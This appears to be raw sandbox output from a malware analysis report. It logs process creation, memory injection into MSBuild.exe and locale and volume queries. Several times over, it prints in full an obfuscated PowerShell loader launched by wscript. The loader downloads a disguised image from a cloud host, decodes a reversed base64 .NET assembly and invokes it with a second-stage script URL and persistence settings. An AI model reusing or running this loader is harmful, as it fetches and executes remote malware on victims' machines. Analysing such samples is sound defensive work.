Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 457000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 470000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 476000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 47B000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 954008

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe

27_2_00410F36

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 27_2_00418764 mouse_event,

27_2_00418764

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '0/LucV5/d/ee.e#sap//:sp##h';$restoredText = $originalText -replace '#', 't';$iLnBGeoOpffqoUAKmlhR = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$WhccGUizbJWaNhoCLZCL = New-Object System.Net.WebClient;$NGKHbmbLgczBefhfOAGi = $WhccGUizbJWaNhoCLZCL.DownloadData($iLnBGeoOpffqoUAKmlhR);$KodpfKtodcZPWkkULGWU = [System.Text.Encoding]::UTF8.GetString($NGKHbmbLgczBefhfOAGi);$kQbJzINbGPimbikLeLWW = '<<BASE64_START>>';$KNIAGgPKpufLIacbNxjH = '<<BASE64_END>>';$txWWUeAUmepGGoaWUeCB = $KodpfKtodcZPWkkULGWU.IndexOf($kQbJzINbGPimbikLeLWW);$TPWfGTAfLfnGqWLfpiIW = $KodpfKtodcZPWkkULGWU.IndexOf($KNIAGgPKpufLIacbNxjH);$txWWUeAUmepGGoaWUeCB -ge 0 -and $TPWfGTAfLfnGqWLfpiIW -gt $txWWUeAUmepGGoaWUeCB;$txWWUeAUmepGGoaWUeCB += $kQbJzINbGPimbikLeLWW.Length;$UoiilKJdRANLoPpnucKc = $TPWfGTAfLfnGqWLfpiIW - $txWWUeAUmepGGoaWUeCB;$HhBCjWCWcOAOGasdihln = $KodpfKtodcZPWkkULGWU.Substring($txWWUeAUmepGGoaWUeCB, $UoiilKJdRANLoPpnucKc);$OOiPlmOGWcLpOBNCiWdR = -join ($HhBCjWCWcOAOGasdihln.ToCharArray() \| ForEach-Object { $_ })[-1..-($HhBCjWCWcOAOGasdihln.Length)];$NmLoUkntiBnWiQrtLteW = [System.Convert]::FromBase64String($OOiPlmOGWcLpOBNCiWdR);$QpquWoUGdWWllhPbBgox = [System.Reflection.Assembly]::Load($NmLoUkntiBnWiQrtLteW);$qUzNNPuWfsNLioKiONSx = [dnlib.IO.Home].GetMethod('VAI');$qUzNNPuWfsNLioKiONSx.Invoke($null, @($restoredText, '1', 'hpiCiWTCNopizuWaGzCt', 'hpiCiWTCNopizuWaGzCt', 'MSBuild', 'hpiCiWTCNopizuWaGzCt','hpiCiWTCNopizuWaGzCt','1','https://102.175.153.160.host.secureserver.net/file.js', 'C:\\ProgramData','smudgy','js','5','hpiCiWTCNopizuWaGzCt','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "hpiCiWTCNopizuWaGzCt\hpiCiWTCNopizuWaGzCt.vbs"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\smudgy.js"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\yqrnzxuewrllgkpigkbsooiasehxvvunub"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\akwgap"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\lmkqsiyzy"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\lmkqsiyzy"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '0/LucV5/d/ee.e#sap//:sp##h';$restoredText = $originalText -replace '#', 't';$iLbCTNCSacaUBlznKdLL = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$BAKhKaLKKhUzWAiLoPeT = New-Object System.Net.WebClient;$CUcWoiOZbZlLkKfkLNKn = $BAKhKaLKKhUzWAiLoPeT.DownloadData($iLbCTNCSacaUBlznKdLL);$hnbcLZWZIRphWirWbKoP = [System.Text.Encoding]::UTF8.GetString($CUcWoiOZbZlLkKfkLNKn);$WdhGWGnCuzIoSWNGzakW = '<<BASE64_START>>';$IiaPzGlWLWAWULkdGasx = '<<BASE64_END>>';$oiGGvTReStQZLhKLLBWJ = $hnbcLZWZIRphWirWbKoP.IndexOf($WdhGWGnCuzIoSWNGzakW);$LcWLWIWLKiPfApOLgbhR = $hnbcLZWZIRphWirWbKoP.IndexOf($IiaPzGlWLWAWULkdGasx);$oiGGvTReStQZLhKLLBWJ -ge 0 -and $LcWLWIWLKiPfApOLgbhR -gt $oiGGvTReStQZLhKLLBWJ;$oiGGvTReStQZLhKLLBWJ += $WdhGWGnCuzIoSWNGzakW.Length;$khUWOGOLPuNkKWuNlJGL = $LcWLWIWLKiPfApOLgbhR - $oiGGvTReStQZLhKLLBWJ;$vZCZRhsdWpmjLCUemdQR = $hnbcLZWZIRphWirWbKoP.Substring($oiGGvTReStQZLhKLLBWJ, $khUWOGOLPuNkKWuNlJGL);$sHPbLeLWLSAKZkdaLmxt = -join ($vZCZRhsdWpmjLCUemdQR.ToCharArray() \| ForEach-Object { $_ })[-1..-($vZCZRhsdWpmjLCUemdQR.Length)];$AlkLoWLeqkLxkmviBqWi = [System.Convert]::FromBase64String($sHPbLeLWLSAKZkdaLmxt);$WxLPHeKiGUInbiBzcbRa = [System.Reflection.Assembly]::Load($AlkLoWLeqkLxkmviBqWi);$OLiclpBLBaWWdiULbLvU = [dnlib.IO.Home].GetMethod('VAI');$OLiclpBLBaWWdiULbLvU.Invoke($null, @($restoredText, 'kSUPzeWAKqsWhWRWCogL', 'kSUPzeWAKqsWhWRWCogL', 'kSUPzeWAKqsWhWRWCogL', 'MSBuild', 'kSUPzeWAKqsWhWRWCogL', 'kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','1','kSUPzeWAKqsWhWRWCogL','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };$originaltext = '0/lucv5/d/ee.e#sap//:sp##h';$restoredtext = $originaltext -replace '#', 't';$ilnbgeoopffqouakmlhr = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$whccguizbjwanhoclzcl = new-object system.net.webclient;$ngkhbmblgczbefhfoagi = $whccguizbjwanhoclzcl.downloaddata($ilnbgeoopffqouakmlhr);$kodpfktodczpwkkulgwu = [system.text.encoding]::utf8.getstring($ngkhbmblgczbefhfoagi);$kqbjzinbgpimbiklelww = '<<base64_start>>';$kniaggpkpufliacbnxjh = '<<base64_end>>';$txwwueaumepggoawuecb = $kodpfktodczpwkkulgwu.indexof($kqbjzinbgpimbiklelww);$tpwfgtaflfngqwlfpiiw = $kodpfktodczpwkkulgwu.indexof($kniaggpkpufliacbnxjh);$txwwueaumepggoawuecb -ge 0 -and $tpwfgtaflfngqwlfpiiw -gt $txwwueaumepggoawuecb;$txwwueaumepggoawuecb += $kqbjzinbgpimbiklelww.length;$uoiilkjdranloppnuckc = $tpwfgtaflfngqwlfpiiw - $txwwueaumepggoawuecb;$hhbcjwcwcoaogasdihln = $kodpfktodczpwkkulgwu.substring($txwwueaumepggoawuecb, $uoiilkjdranloppnuckc);$ooiplmogwclpobnciwdr = -join ($hhbcjwcwcoaogasdihln.tochararray() \| foreach-object { $_ })[-1..-($hhbcjwcwcoaogasdihln.length)];$nmloukntibnwiqrtltew = [system.convert]::frombase64string($ooiplmogwclpobnciwdr);$qpquwougdwwllhpbbgox = [system.reflection.assembly]::load($nmloukntibnwiqrtltew);$quznnpuwfsnliokionsx = [dnlib.io.home].getmethod('vai');$quznnpuwfsnliokionsx.invoke($null, @($restoredtext, '1', 'hpiciwtcnopizuwagzct', 'hpiciwtcnopizuwagzct', 'msbuild', 'hpiciwtcnopizuwagzct','hpiciwtcnopizuwagzct','1','https://102.175.153.160.host.secureserver.net/file.js', 'c:\\programdata','smudgy','js','5','hpiciwtcnopizuwagzct','taskname'));if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };$originaltext = '0/lucv5/d/ee.e#sap//:sp##h';$restoredtext = $originaltext -replace '#', 't';$ilbctncsacaublznkdll = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$bakhkalkkhuzwailopet = new-object system.net.webclient;$cucwoiozbzllkkfklnkn = $bakhkalkkhuzwailopet.downloaddata($ilbctncsacaublznkdll);$hnbclzwzirphwirwbkop = [system.text.encoding]::utf8.getstring($cucwoiozbzllkkfklnkn);$wdhgwgncuzioswngzakw = '<<base64_start>>';$iiapzglwlwawulkdgasx = '<<base64_end>>';$oiggvtrestqzlhkllbwj = $hnbclzwzirphwirwbkop.indexof($wdhgwgncuzioswngzakw);$lcwlwiwlkipfapolgbhr = $hnbclzwzirphwirwbkop.indexof($iiapzglwlwawulkdgasx);$oiggvtrestqzlhkllbwj -ge 0 -and $lcwlwiwlkipfapolgbhr -gt $oiggvtrestqzlhkllbwj;$oiggvtrestqzlhkllbwj += $wdhgwgncuzioswngzakw.length;$khuwogolpunkkwunljgl = $lcwlwiwlkipfapolgbhr - $oiggvtrestqzlhkllbwj;$vzczrhsdwpmjlcuemdqr = $hnbclzwzirphwirwbkop.substring($oiggvtrestqzlhkllbwj, $khuwogolpunkkwunljgl);$shpblelwlsakzkdalmxt = -join ($vzczrhsdwpmjlcuemdqr.tochararray() \| foreach-object { $_ })[-1..-($vzczrhsdwpmjlcuemdqr.length)];$alklowleqklxkmvibqwi = [system.convert]::frombase64string($shpblelwlsakzkdalmxt);$wxlphekiguinbibzcbra = [system.reflection.assembly]::load($alklowleqklxkmvibqwi);$oliclpblbawwdiulblvu = [dnlib.io.home].getmethod('vai');$oliclpblbawwdiulblvu.invoke($null, @($restoredtext, 'ksupzewakqswhwrwcogl', 'ksupzewakqswhwrwcogl', 'ksupzewakqswhwrwcogl', 'msbuild', 'ksupzewakqswhwrwcogl', 'ksupzewakqswhwrwcogl','ksupzewakqswhwrwcogl','ksupzewakqswhwrwcogl','ksupzewakqswhwrwcogl','ksupzewakqswhwrwcogl','ksupzewakqswhwrwcogl','1','ksupzewakqswhwrwcogl','taskname'));if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };$originaltext = '0/lucv5/d/ee.e#sap//:sp##h';$restoredtext = $originaltext -replace '#', 't';$ilnbgeoopffqouakmlhr = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$whccguizbjwanhoclzcl = new-object system.net.webclient;$ngkhbmblgczbefhfoagi = $whccguizbjwanhoclzcl.downloaddata($ilnbgeoopffqouakmlhr);$kodpfktodczpwkkulgwu = [system.text.encoding]::utf8.getstring($ngkhbmblgczbefhfoagi);$kqbjzinbgpimbiklelww = '<<base64_start>>';$kniaggpkpufliacbnxjh = '<<base64_end>>';$txwwueaumepggoawuecb = $kodpfktodczpwkkulgwu.indexof($kqbjzinbgpimbiklelww);$tpwfgtaflfngqwlfpiiw = $kodpfktodczpwkkulgwu.indexof($kniaggpkpufliacbnxjh);$txwwueaumepggoawuecb -ge 0 -and $tpwfgtaflfngqwlfpiiw -gt $txwwueaumepggoawuecb;$txwwueaumepggoawuecb += $kqbjzinbgpimbiklelww.length;$uoiilkjdranloppnuckc = $tpwfgtaflfngqwlfpiiw - $txwwueaumepggoawuecb;$hhbcjwcwcoaogasdihln = $kodpfktodczpwkkulgwu.substring($txwwueaumepggoawuecb, $uoiilkjdranloppnuckc);$ooiplmogwclpobnciwdr = -join ($hhbcjwcwcoaogasdihln.tochararray() \| foreach-object { $_ })[-1..-($hhbcjwcwcoaogasdihln.length)];$nmloukntibnwiqrtltew = [system.convert]::frombase64string($ooiplmogwclpobnciwdr);$qpquwougdwwllhpbbgox = [system.reflection.assembly]::load($nmloukntibnwiqrtltew);$quznnpuwfsnliokionsx = [dnlib.io.home].getmethod('vai');$quznnpuwfsnliokionsx.invoke($null, @($restoredtext, '1', 'hpiciwtcnopizuwagzct', 'hpiciwtcnopizuwagzct', 'msbuild', 'hpiciwtcnopizuwagzct','hpiciwtcnopizuwagzct','1','https://102.175.153.160.host.secureserver.net/file.js', 'c:\\programdata','smudgy','js','5','hpiciwtcnopizuwagzct','taskname'));if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };$originaltext = '0/lucv5/d/ee.e#sap//:sp##h';$restoredtext = $originaltext -replace '#', 't';$ilbctncsacaublznkdll = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$bakhkalkkhuzwailopet = new-object system.net.webclient;$cucwoiozbzllkkfklnkn = $bakhkalkkhuzwailopet.downloaddata($ilbctncsacaublznkdll);$hnbclzwzirphwirwbkop = [system.text.encoding]::utf8.getstring($cucwoiozbzllkkfklnkn);$wdhgwgncuzioswngzakw = '<<base64_start>>';$iiapzglwlwawulkdgasx = '<<base64_end>>';$oiggvtrestqzlhkllbwj = $hnbclzwzirphwirwbkop.indexof($wdhgwgncuzioswngzakw);$lcwlwiwlkipfapolgbhr = $hnbclzwzirphwirwbkop.indexof($iiapzglwlwawulkdgasx);$oiggvtrestqzlhkllbwj -ge 0 -and $lcwlwiwlkipfapolgbhr -gt $oiggvtrestqzlhkllbwj;$oiggvtrestqzlhkllbwj += $wdhgwgncuzioswngzakw.length;$khuwogolpunkkwunljgl = $lcwlwiwlkipfapolgbhr - $oiggvtrestqzlhkllbwj;$vzczrhsdwpmjlcuemdqr = $hnbclzwzirphwirwbkop.substring($oiggvtrestqzlhkllbwj, $khuwogolpunkkwunljgl);$shpblelwlsakzkdalmxt = -join ($vzczrhsdwpmjlcuemdqr.tochararray() \| foreach-object { $_ })[-1..-($vzczrhsdwpmjlcuemdqr.length)];$alklowleqklxkmvibqwi = [system.convert]::frombase64string($shpblelwlsakzkdalmxt);$wxlphekiguinbibzcbra = [system.reflection.assembly]::load($alklowleqklxkmvibqwi);$oliclpblbawwdiulblvu = [dnlib.io.home].getmethod('vai');$oliclpblbawwdiulblvu.invoke($null, @($restoredtext, 'ksupzewakqswhwrwcogl', 'ksupzewakqswhwrwcogl', 'ksupzewakqswhwrwcogl', 'msbuild', 'ksupzewakqswhwrwcogl', 'ksupzewakqswhwrwcogl','ksupzewakqswhwrwcogl','ksupzewakqswhwrwcogl','ksupzewakqswhwrwcogl','ksupzewakqswhwrwcogl','ksupzewakqswhwrwcogl','1','ksupzewakqswhwrwcogl','taskname'));if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };"	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 27_2_00433E1A cpuid

27_2_00433E1A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,	27_2_004510CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: EnumSystemLocalesW,	27_2_004470BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	27_2_004511F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,	27_2_004512FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	27_2_004513C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,	27_2_004475A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoA,	27_2_0040E679
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	27_2_00450A8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: EnumSystemLocalesW,	27_2_00450D52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: EnumSystemLocalesW,	27_2_00450D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: EnumSystemLocalesW,	27_2_00450DED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	27_2_00450E7A

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
